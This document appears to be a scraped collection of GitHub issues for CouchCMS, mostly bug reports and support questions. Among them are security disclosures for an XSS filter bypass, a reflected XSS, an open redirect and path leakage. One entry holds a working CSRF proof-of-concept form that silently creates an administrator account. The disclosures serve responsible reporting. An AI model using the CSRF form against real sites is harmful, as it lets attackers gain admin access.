couchcms / couchcms Goto Github PK

Took me about 7 hours to figure out what the issue was (I was migrating site) on latest Couch build.

Related:
http://www.couchcms.com/forum/viewtopic.php?f=4&t=8699
https://support.cloudflare.com/hc/en-us/articles/200169976-Why-isn-t-my-CMS-editor-working-after-changing-to-CloudFlare-

Buggy interface:

You can turn off Rocket loader globally, but I did the following to fix the problem:
In admin\includes\ckeditor\ckeditor_php5.php:460, I replaced with the following:

$out .= "<script type=\"text/javascript\" data-cfasync=\"false\" src=\"" . $ckeditorPath . 'ckeditor.js' . $args . "\"></script>\n";

I realize this is a addon issue, but still, might be helpful to fix.

I don't understand, why the icon magnifying-glass is used for previewing a page. This icon is worldwide used for searching. We should better use the icon eye.

it is possible to bypass the cleanXSS function (in https://github.com/CouchCMS/CouchCMS/blob/master/couch/functions.php) and anyone who have control on the input to the function can inject code that can cause XSS.
so any piece of code which relies on cleanXSS to filter the input from XSS may be vulnerable to either reflected XSS or stored XSS - depends on the situation.
(some other attacks might be possible).

this is the code i used to test the cleanXSS function (i didn't revealed here the payload string for obvious reasons) (sorry for the bad php :) ) :

<?php
ob_start();

if ( !defined('K_COUCH_DIR') ) define( 'K_COUCH_DIR', str_replace( '\\', '/', dirname(realpath(__FILE__) ).'/') );
$get = isset( $_GET['redirect'] ) ? $_GET['redirect'] : null; // get it before header.php sanitizes and converts '&' to '&amp;';
require_once( K_COUCH_DIR.'header.php' );
$_GET['redirect'] = $get; // can bypass sanitization because we'll sanitize URL ourselves later on.

$default_dest = ( $AUTH->user->access_level < K_ACCESS_LEVEL_ADMIN ) ? K_SITE_URL : K_ADMIN_URL . K_ADMIN_PAGE;
$dest = isset($_GET['redirect']) ? $_GET['redirect'] : $default_dest;


global $FUNCS;

$result = new KFuncs();
$text = $_GET['input'];
$check = strlen ($text);
//$text = trim( $text );
$check = strlen ($text);
$text = $FUNCS->cleanXSS($_GET['input']);

echo "<!DOCTYPE html>\r\n";
echo $text . "\r\n" ;

and here is the generated page:

As the title says, creating a KWebpage instance with $template_id constructor parameter as null will result in couch/index.php being added as a template in couch_templates table.

My guess is that the _fill_template_info function in KWebpage is causing this. Specifically this code:

if( !count($rs) ){
    // Template needs to be added. Make sure the user is logged-in as super-admin
   $AUTH->check_access( K_ACCESS_LEVEL_SUPER_ADMIN );
   $rs = $DB->insert( K_TBL_TEMPLATES, array('name'=>$tpl_name, 'description'=>'') );
   $rs = $DB->select( K_TBL_TEMPLATES, array('*'), "name='" . $DB->sanitize( $tpl_name ). "'" );
   if( !count($rs) ) die( "ERROR: Failed to insert record in K_TBL_TEMPLATES" );

   // HOOK: template_inserted
   $FUNCS->dispatch_event( 'template_inserted', array(&$rs[0], &$this) );
}

I'm not sure this is a bug or it's an intended feature.

After the Super Admin logged in, open the following one page
poc：
1.html---add a administrator user

  <!-- CSRF PoC  -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/CouchCMS-master/couch/?o=users&q=create/43682d829531862171cef56ccf6ef26b" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="f&#95;k&#95;name" value="root" />
      <input type="hidden" name="f&#95;k&#95;title" value="root" />
      <input type="hidden" name="f&#95;k&#95;email" value="root&#64;root&#46;com" />
      <input type="hidden" name="f&#95;k&#95;levels&#95;list" value="7" />
      <input type="hidden" name="f&#95;k&#95;password" value="root&#64;" />
      <input type="hidden" name="f&#95;k&#95;password2" value="root&#64;" />
      <input type="hidden" name="k&#95;custom&#95;action" value="" />
      <input type="hidden" name="k&#95;hid&#95;k&#95;admin&#95;frm" value="k&#95;admin&#95;frm" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>```

Could sending the HTTP response code 301 with the redirects for PrettyURLs be an option able which can be toggled via the config rather than hard coded?

When they're enabled, the redirect itself gets cached will persist if turned off until one clears their browser cache.

It'd be nicer to be able to toggle them off when desired rather than having to edit that part out of the code.

Hello!

Whenever I upload an image it is always accompanied by the corresponding URL (example below). I'm not sure why it's doing this.

This html reads simply with the img tag and text next to it outside of tags. Any help would be appreciated.

Hello,

Would there be a way to create multiple templates for a single page site? The reason being, I want each section and it's editables separated by template to make the dashboard look cleaner. That way, if I add a new section I can add a new template.

I've looked through the documentation but can't seem to think of one

Please make the template globals (introduced in v2.1) available for all types of pages, not just the clonable ones. It would get eliminate the need of creating a globals.php and make the "Manage Globals" button available on all types of pages.

Beyond the code within globals.php (such as line 169) the admin template/theme will also need to be updated as regular pages don't have any buttons in use on the top right.

When I rename a group in cloneable pages, the old named group will not be deleted. The old group is not deletable in any manner.

Recently ran into a case where I accidentally closed my browser and lost all my work on an article. Would be nice if CouchCMS could somehow include an auto-save every n seconds to a draft.

There are annoying scrollbars and Save button is not fully visible. Success/Error message needs a proper positioning as well.

Thanks and regards

Hi Kamran,

Test code

<cms:mosaic name='mosaic_1' label='Mosaic' >
    <cms:tile name='mosaic_1_tile' label='Tile'>

        <cms:editable type='text' name='text' label='Text' />

        <cms:config_form_view>
            <cms:html>
                <cms:show_info>
                    TEST
                </cms:show_info>
            </cms:html>
        </cms:config_form_view>

    </cms:tile>
</cms:mosaic>

Best
Antony

Hi,
I have surrounded editable content with the required tags as instructed. It appears fine in the CMS editor as well. However, when I add a content in editable box and Save the page, tags are inserted in the saved page.
For example,

<h1-mod class="blue-text line-height1.8">Heading 1</h1-mod>
<ol >
 <li> <p4-mod class="medium-font blue-text">Bullet 1</p4-mod> </p4-mod></li>
 <li> <p4-mod class="medium-font blue-text">Bullet 2</p4-mod> </p4-mod></li>
 <li> <p4-mod class="medium-font blue-text">Bullet 3</p4-mod> </p4-mod></li>
</ol> 

The content appears fine in CMS editor initially, but when I make any changes to the content, the output page contains tags as well and original fonts are also changed.
Please guide how to solve this issue.

Regards,
Ayush

@kksidd,

Deprecated: Array and string offset access syntax with curly braces is deprecated
in couch\addons\multi-lang\multi-lang.php on line 268

It's in the addon with cms:show_with_lc, not the other one. — Topic

Edit: fixed line num

If K_DB_PASSWORD is empty, but database requires a password then besides a message to user a Warning happens –

PHP Warning: mysqli_error() expects parameter 1 to be mysqli, boolean given in couch\includes\mysql2i\mysql2i.class.php on line 139

Could not successfully run query: Duplicate column name 'type'

I can't seem to figure out how to make one change for multiple php pages.

For example, if I set the page title for index.php I would like every other page to have the same title without having to manually updating each page.

It looks like a clonable page issue, but I can't seem to figure it out. Any help is appreciated.

MySQL extension added in PHP version 2.0. and deprecated as of PHP 5.5.0.

MySQLi extension added in PHP 5.5 and will work on MySQL 4.1.3 or above.

More info:

https://phppot.com/php/mysql-vs-mysqli-in-php/

https://dzone.com/articles/convert-mysql-to-mysqli

Why do you not post actual TEXT of the source instead of stupid images?
In this image , the source is clipped:
http://docs.couchcms.com/assets/img/contents/portfolio-site-184.png

Please change all your code "snippets" in your tutorials to actual source code, vs. images due to this problem.

When I put some <cms:editable type='image' /> with <cms:editable type='thumbnail' /> in a row, thumbnail stops after rendering 1-2 photos. And I don't understand, why thumbnails are shown after all images in Backend.

Used PNG: http://placehold.jp/99ccff/003366/1280x1160.png

<cms:editable name='g4' label='Gallery 4' type='group' collapsed='0'/>
<cms:editable type='image' name='foto41' label='Photo' group='g4' show_preview='1' preview_width='150' desc='Photo 1'/>
<cms:editable type='thumbnail' name='foto41thumb' label='Photo Ausschnitt' group='g4' show_preview='1' preview_width='150' width='640' height='580' quality='90' assoc_field='foto41'/>
<cms:editable type='image' name='foto42' label='Photo' group='g4' show_preview='1' preview_width='150' desc='Photo 2'/>
<cms:editable type='thumbnail' name='foto42thumb' label='Photo Ausschnitt' group='g4' show_preview='1' preview_width='150' width='640' height='580' quality='90' assoc_field='foto42'/>
<cms:editable type='image' name='foto43' label='Photo' group='g4' show_preview='1' preview_width='150' desc='Photo 3'/>
<cms:editable type='thumbnail' name='foto43thumb' label='Photo Ausschnitt' group='g4' show_preview='1' preview_width='150' width='640' height='580' quality='90' assoc_field='foto43'/>
<cms:editable type='image' name='foto44' label='Photo' group='g4' show_preview='1' preview_width='150' desc='Photo 4'/>
<cms:editable type='thumbnail' name='foto44thumb' label='Photo Ausschnitt' group='g4' show_preview='1' preview_width='150' width='640' height='580' quality='90' assoc_field='foto44'/>

Is this the official repository of CouchCMS (http://www.couchcms.com/) or just a fork?

On http://www.couchcms.com/ I have seen that the latest version is 1.4, 15th Oct. 2013, which is quiet some time ago now.

Is CouchCMS still being actively developed?

please consider updating secureimage.php and ckeditor!
and it's a good idea to add more editors like Tinymce

PHP Warning: count(): Parameter must be an array or an object that implements Countable in couch\addons\data-bound-form\securefile.php on line 209

I have benchmarked an almost-empty page in localhost installation with latest Couch codebase with ab —

ab -n 500 -c 50 -l http://localhost/index.php

Once in a while randomly several warning spawns PHP Warning: mysqli_error() expects parameter 1 to be mysqli, boolean given in ..couch\includes\mysql2i\mysql2i.class.php on line 139

I've seen other forum threads (1, 2) and I hope something can be done to prevent this warning from happening ever again under stress.

Extended Users addon:
$FUNCS->add_event_listener( 'page_presave', array($KUSER, 'sanitize_title') );
The function has return; statement right at the beginning and is either redundant or disfunctional..

Unfortunately, I am looking at this error message.
Error setting in php.ini set to error_reporting = E_ALL & ~E_NOTICE, display_errors = On.

PHP Warning: count(): Parameter must be an array or an object that implements Countable in D:\CloudOne\OpenServer\domains\my.couchcms.pro\couch\uploader.php on line 265

• CouchCMS Version 2.2.1 (20200116)
• PHP 7.2 x64

Is there a way to add a button to export the html code of each page that I create?

When are planning to land the PHP 7 support?

Warning: urlencode() expects parameter 1 to be string, array given in couch\functions.php on line 1719

This occurs if $_GET consists of deeper arrays (more than 1 level) in backend list-view. For example, DataTables generate complex qs. There should be an extra check for !array before performing urlencode.

Same problem again with valid page name -
Test URL:
http://localhost/index.php?pname=0

Hello,

Is it possible to make elements that have no information disappear? For example, I have social media icons on a layout, but I want the ones that aren't filled with the URL to not display.

Any help is appreciated

When adding an entry of a clone-able page and saving it doesnt update and show the new entry when clicking on the navigation button to show the added entries

Clicking on the navigation button to view the entries doesnt update unless an explicit page refresh.

For me this not a problem but is hard to explain to a client that they need to refresh every time to avoid adding duplicates.

Hi guys, I have a situation where I have lots of thumbnails being generated on a page.

I have a list of images with varations for responsive layout. So in my example I have 17 images and a logic that generate thumbs for 3 different sizes + 2x (retina display) version for each image and output a CSS media queries inside <head>. So I have 102 different images.

I was experiencing slow page load, between 10 and 12 seconds. While debugging, I saw that inside couch/includes/timthumb.php, the if that verifies the thumb exists is after the moment where image is opened.

• https://github.com/CouchCMS/CouchCMS/blob/master/couch/includes/timthumb.php#L59 - opening the file;
• https://github.com/CouchCMS/CouchCMS/blob/master/couch/includes/timthumb.php#L126 - return if thumb exists;

I got the content of the if in line 126 and placed it right before line 59. Everything is working fine in my project and much faster, as the image doesn't need to be opened when the thumbnail is already generated.

The page load time here dropped from ≈11s to ≈0.5s. Maybe that's something to implement in the source code? (I can create a PR for this) I couldn't see any possible problem with this solution as before it just check some size and make some calculations.

Depending on your timezone settings, the _checkdate function of class KDateTime results in an error message "Publish Date: Invalid Date" when trying to populate a field within the mosaic in the admin panel. This is because the regex doesn't take into account the possible suffix, such as "GMT". As a dirty hack, I added "( \D{3})?" to the end of the regex, making the full line (382) read as follows.
$pattern = ( $with_time ) ? '/^(\d{4})-(\d{2})-(\d{2}) ([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])( \D{3})?$/' : '/^(\d{4})-(\d{2})-(\d{2})(([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9]))?( \D{3})?$/';

Btw, let me know if you prefer to prefer issues and features reported on github or in the forums. I'll adjust accordingly.

Couch Sitemap (https://www.couchcms.com/forum/viewtopic.php?f=8&t=11000) not rendering

Regarding CouchCMS 2.2.1 there are some rendering issues with some localizations like:
Screenshot

Shouldn't be cart addon maintained in repo?

• Couch version 2.0
  

Location:
includes/mysql2i/mysql2i.func.php and addons/phpmailer/phpmailer.php

Rows : 10

Harm:
Web Site physical path leakage .

phpmailer hasn't been uploaded to github for version 2...

I am not sure what's wrong with this but my website is not showing up any
type of styling.

There is Reflected XSS vulnerability in couch/includes/plupload/upload.php file.

The vulnerable code is:

upload.php:9 $fn = ( isset($_GET['fn']) ) ? $_GET['fn'] : '/';
upload.php:12 $upload_link = K_ADMIN_URL . 'uploader.php?tpl='.$tpl.'&fid='.$fid.'&fn='.$fn.'&nonce='. $nonce;
upload.php:157 url: '<?php echo $upload_link; ?>',

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.

To prevent xss use next manual: https://portswigger.net/web-security/cross-site-scripting/preventing.

Please let me know about any fixes, I would like to register CVE number.

The last revision is different from the one used in current CouchCMS build.
https://gist.github.com/dperini/729294/revisions

Also, it won't hurt to add a default protocol if omitted..
if (!preg_match("~^(?:f|ht)tps?://~i", $url)) $url = "http://" . $url;

PHP Warning: count(): Parameter must be an array or an object that implements Countable in \couch\addons\repeatable\repeatable.php on line 202

Hello, the test case is as follows -

<cms:php>
    global $CTX, $KROUTES;
    $CTX->set( 'arr', $KROUTES->routes );
</cms:php>

<cms:each arr>
    <cms:if k_first_item ><ul></cms:if>
    <cms:if "<cms:is_array item />">
        <li>
            <kbd><cms:show key /></kbd> :
            <cms:each item>
                <cms:if k_first_item ><ul></cms:if>
                <cms:if "<cms:is_array item />">
                    <li>
                        <kbd><cms:show key /></kbd> :
                        <cms:each item>
                            <cms:if k_first_item ><ul></cms:if>
                            <cms:if "<cms:is_array item />">
                                <li>
                                    <kbd><cms:show key /></kbd> :
                                    <cms:each item>
                                        <cms:if k_first_item ><ul></cms:if>
                                        <cms:if "<cms:is_array item />">
                                            <li>
                                                <kbd><cms:show key /></kbd> : array(<cms:array_count item />)
                                            </li>
                                        <cms:else />
                                            <li><kbd><cms:show key /></kbd> : <cms:show item /></li>
                                        </cms:if>
                                        <cms:if k_last_item ></ul></cms:if>
                                    </cms:each>
                                </li>
                            <cms:else />
                                <li><kbd><cms:show key /></kbd> : <cms:show item /></li>
                            </cms:if>
                            <cms:if k_last_item ></ul></cms:if>
                        </cms:each>
                    </li>
                <cms:else />
                    <li><kbd><cms:show key /></kbd> : <cms:show item /></li>
                </cms:if>
                <cms:if k_last_item ></ul></cms:if>
            </cms:each>
        </li>
    <cms:else />
        <li><kbd><cms:show key /></kbd> : <cms:show item /></li>
    </cms:if>
    <cms:if k_last_item ></ul></cms:if>
</cms:each>

Problem: if array value is NULL, Context returns parent value. It becomes an endless loop in recursive functions.

While following the tutorial, got this error on trying to upload an image:

Error text:
Deprecated: Function get_magic_quotes_gpc() is deprecated in C:\xampp\htdocs\couch\couch\includes\kcfinder\lib\class_input.php on line 38

Code used to generate the field:
<cms:editable name='imagem_destacada' crop='1' width='610' height='150' type='image' />

Error line at the error message path:
$this->magic_quotes_gpc = function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc();

Hi, dev team!

There is Open redirect vulnerability in couch/addons/cart/cart.php file.

The vulnerable code is:

cart.php:589: $location = $FUNCS->sanitize_url( trim($_GET['redirect']) ); // $_GET already comes urldecoded
cart.php:605: header( "Location: " . $location );

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.

To prevent Open redirect vulnerability use next manual: https://portswigger.net/kb/issues/00500100_open-redirection-reflected (Remediation: Open redirection section)

Please let me know about any fixes, I would like to register CVE number.